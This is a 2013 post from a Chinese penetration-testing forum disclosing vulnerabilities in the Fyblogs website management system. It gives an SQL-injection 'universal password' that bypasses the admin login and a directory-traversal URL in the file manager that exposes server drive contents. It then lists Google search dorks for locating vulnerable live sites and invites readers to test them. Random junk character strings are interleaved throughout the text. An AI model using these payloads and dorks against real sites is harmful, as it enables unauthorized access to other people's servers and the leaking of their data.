中国网络渗透测试联盟

标题: Fyblogs网站管理系统漏洞 [打印本页]
作者: admin    时间: 2013-3-7 13:07
标题: Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过  u9 B# A/ c, b; h$ s
9 {2 M$ n- ^6 B- Q& [7 @5 x0 Q" u
简要描述:; w) i  ]: \- _. K
! h% a( [4 {# O. ~6 E  F& q; `
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!3 N# d, ?/ l" j

) y1 H( J" S! w; U* q0 |详细说明:
) o) V: g2 H0 e4 I7 `
7 f" _. R% j+ ]. ?后台万能密码 'or'='or'
& K, i2 J; p  a- V! h后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
2 [! m( r, e, y9 }0 Jadmin/uploadfile.asp?currentFolder=/upfiles/../
$ F3 p% h+ H+ a5 I6 j- I0 v2 k* S1 \, X7 O- s" w4 _" m9 a; G
漏洞证明:/ v. W4 I; N/ H! s4 `. |% A
5 \& Y( H) r/ x- M
谷歌:inurl:type.asp?id=1 新闻中心
9 U* ?; t# I+ Z或者 :inurl:download_ok.asp?
% X; i6 ~+ ]6 B, x% y, o- C) K% ]1 G* x5 T* N
可以测试0 a4 w" X, m1 Q$ s5 ^; c8 a5 z' t

% S5 [7 X) d& ~, _$ R! b- ?8 L8 }1 i" e




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2